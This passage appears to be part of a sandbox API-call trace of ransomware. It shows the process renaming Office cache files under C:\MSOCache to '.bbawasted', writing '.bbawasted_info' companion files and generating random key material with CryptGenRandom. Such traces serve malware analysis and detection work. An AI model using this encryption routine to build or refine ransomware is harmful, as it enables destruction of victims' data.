lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0066.972] WriteFile (in: hFile=0x114, lpBuffer=0x5b9910*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5b9910*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0066.973] SetEndOfFile (hFile=0x114) returned 1 [0066.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.973] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b9910 | out: hHeap=0x580000) returned 1 [0066.973] lstrcpyW (in: lpString1=0x5b96f8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0066.973] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted")) returned 1 [0066.976] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0066.976] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0066.977] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x8f8 [0066.977] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8f8) returned 0x570000 [0066.977] CloseHandle (hObject=0x118) returned 1 [0066.980] UnmapViewOfFile (lpBaseAddress=0x570000) returned 1 [0066.980] CloseHandle (hObject=0x11c) returned 1 [0066.980] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x200) returned 0x5ba918 [0066.980] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0066.981] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5ba960 | out: pbBuffer=0x5ba960) returned 1 [0066.981] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0066.981] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0066.982] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0066.982] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0066.991] SetEndOfFile (hFile=0x114) returned 1 [0066.993] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bd310 | out: hHeap=0x580000) returned 1 [0066.993] CloseHandle (hObject=0x114) returned 1 [0066.995] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b9660 | out: hHeap=0x580000) returned 1 [0066.995] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bab70 | out: hHeap=0x580000) returned 1 [0066.995] WaitForMultipleObjects (nCount=0x2, lpHandles=0x119ff80*=0xec, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0066.996] ResetEvent (hEvent=0xec) returned 1 [0066.996] _aulldvrm () returned 0x0 [0066.996] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0066.997] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0066.997] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0066.997] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 84 [0066.997] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b2) returned 0x5ba918 [0066.997] lstrcpyW (in: lpString1=0x5ba9c0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0066.997] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bcf00 [0066.997] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0066.998] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bcf00 | out: pbBuffer=0x5bcf00) returned 1 [0066.998] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0066.998] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0066.998] WriteFile (in: hFile=0x114, lpBuffer=0x5bcf00*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bcf00*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0066.999] SetEndOfFile (hFile=0x114) returned 1 [0066.999] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.999] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bcf00 | out: hHeap=0x580000) returned 1 [0066.999] lstrcpyW (in: lpString1=0x5ba9c0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0066.999] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.bbawasted")) returned 1 [0067.000] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0067.000] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0067.000] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x5aa [0067.000] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5aa) returned 0x570000 [0067.001] CloseHandle (hObject=0x11c) returned 1 [0067.003] UnmapViewOfFile (lpBaseAddress=0x570000) returned 1 [0067.004] CloseHandle (hObject=0x118) returned 1 [0067.004] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x200) returned 0x5babd8 [0067.004] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.025] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bac20 | out: pbBuffer=0x5bac20) returned 1 [0067.025] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.025] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.026] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.026] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.036] SetEndOfFile (hFile=0x114) returned 1 [0067.038] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b9ec8 | out: hHeap=0x580000) returned 1 [0067.038] CloseHandle (hObject=0x114) returned 1 [0067.045] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba918 | out: hHeap=0x580000) returned 1 [0067.045] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b9660 | out: hHeap=0x580000) returned 1 [0067.045] ResetEvent (hEvent=0xec) returned 1 [0067.045] _aulldvrm () returned 0x0 [0067.045] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.046] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.046] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.046] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0067.046] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5bcf00 [0067.046] lstrcpyW (in: lpString1=0x5bcf98, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.046] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bd1b0 [0067.046] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.047] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bd1b0 | out: pbBuffer=0x5bd1b0) returned 1 [0067.047] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.047] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0067.048] WriteFile (in: hFile=0x114, lpBuffer=0x5bd1b0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bd1b0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.049] SetEndOfFile (hFile=0x114) returned 1 [0067.049] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.049] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bd1b0 | out: hHeap=0x580000) returned 1 [0067.049] lstrcpyW (in: lpString1=0x5bcf98, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.049] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted")) returned 1 [0067.050] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0067.050] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0067.050] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x75e [0067.050] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x75e) returned 0x570000 [0067.050] CloseHandle (hObject=0x118) returned 1 [0067.052] UnmapViewOfFile (lpBaseAddress=0x570000) returned 1 [0067.053] CloseHandle (hObject=0x11c) returned 1 [0067.053] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x200) returned 0x5bd1b0 [0067.053] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.054] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bd1f8 | out: pbBuffer=0x5bd1f8) returned 1 [0067.054] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.054] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.054] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.054] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.063] SetEndOfFile (hFile=0x114) returned 1 [0067.066] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b9ab8 | out: hHeap=0x580000) returned 1 [0067.066] CloseHandle (hObject=0x114) returned 1 [0067.175] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bcf00 | out: hHeap=0x580000) returned 1 [0067.175] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b9768 | out: hHeap=0x580000) returned 1 [0067.175] WaitForMultipleObjects (nCount=0x2, lpHandles=0x119ff80*=0xec, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0067.176] ResetEvent (hEvent=0xec) returned 1 [0067.176] _aulldvrm () returned 0x0 [0067.176] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.177] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.177] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.177] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 83 [0067.177] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b0) returned 0x5b9ab8 [0067.177] lstrcpyW (in: lpString1=0x5b9b5e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.177] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5b9d70 [0067.177] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.178] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5b9d70 | out: pbBuffer=0x5b9d70) returned 1 [0067.178] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.178] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0067.178] WriteFile (in: hFile=0x114, lpBuffer=0x5b9d70*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5b9d70*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.179] SetEndOfFile (hFile=0x114) returned 1 [0067.179] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.179] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b9d70 | out: hHeap=0x580000) returned 1 [0067.180] lstrcpyW (in: lpString1=0x5b9b5e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.bbawasted")) returned 1 [0067.181] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0067.181] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0067.181] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x5aa [0067.181] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5aa) returned 0x570000 [0067.181] CloseHandle (hObject=0x118) returned 1 [0067.184] UnmapViewOfFile (lpBaseAddress=0x570000) returned 1 [0067.184] CloseHandle (hObject=0x110) returned 1 [0067.184] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x200) returned 0x5b9860 [0067.184] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.185] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5b98a8 | out: pbBuffer=0x5b98a8) returned 1 [0067.185] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.185] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.186] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.186] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.195] SetEndOfFile (hFile=0x114) returned 1 [0067.197] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bd310 | out: hHeap=0x580000) returned 1 [0067.197] CloseHandle (hObject=0x114) returned 1 [0067.198] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b9ab8 | out: hHeap=0x580000) returned 1 [0067.199] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b9660 | out: hHeap=0x580000) returned 1 [0067.199] ResetEvent (hEvent=0xec) returned 1 [0067.199] _aulldvrm () returned 0x0 [0067.199] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.200] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.200] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.200] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0067.200] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5bcf00 [0067.200] lstrcpyW (in: lpString1=0x5bcf98, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.200] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bd1b0 [0067.200] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.201] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bd1b0 | out: pbBuffer=0x5bd1b0) returned 1 [0067.201] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.201] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0067.201] WriteFile (in: hFile=0x114, lpBuffer=0x5bd1b0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bd1b0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.202] SetEndOfFile (hFile=0x114) returned 1 [0067.202] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.202] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bd1b0 | out: hHeap=0x580000) returned 1 [0067.202] lstrcpyW (in: lpString1=0x5bcf98, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.202] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted")) returned 1 [0067.203] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0067.203] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0067.203] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x648 [0067.203] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x648) returned 0x570000 [0067.203] CloseHandle (hObject=0x110) returned 1 [0067.206] UnmapViewOfFile (lpBaseAddress=0x570000) returned 1 [0067.206] CloseHandle (hObject=0x118) returned 1 [0067.206] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x200) returned 0x5bd408 [0067.206] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.207] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bd450 | out: pbBuffer=0x5bd450) returned 1 [0067.207] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.207] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.208] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.208] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.217] SetEndOfFile (hFile=0x114) returned 1 [0067.219] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bd408 | out: hHeap=0x580000) returned 1 [0067.219] CloseHandle (hObject=0x114) returned 1 [0067.220] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bcf00 | out: hHeap=0x580000) returned 1 [0067.220] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b9760 | out: hHeap=0x580000) returned 1 [0067.220] WaitForMultipleObjects (nCount=0x2, lpHandles=0x119ff80*=0xec, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0067.227] _aulldvrm () returned 0x0 [0067.228] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.228] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.228] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.228] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 81 [0067.228] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ac) returned 0x5baab8 [0067.228] lstrcpyW (in: lpString1=0x5bab5a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.228] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bdf00 [0067.228] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.229] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bdf00 | out: pbBuffer=0x5bdf00) returned 1 [0067.229] 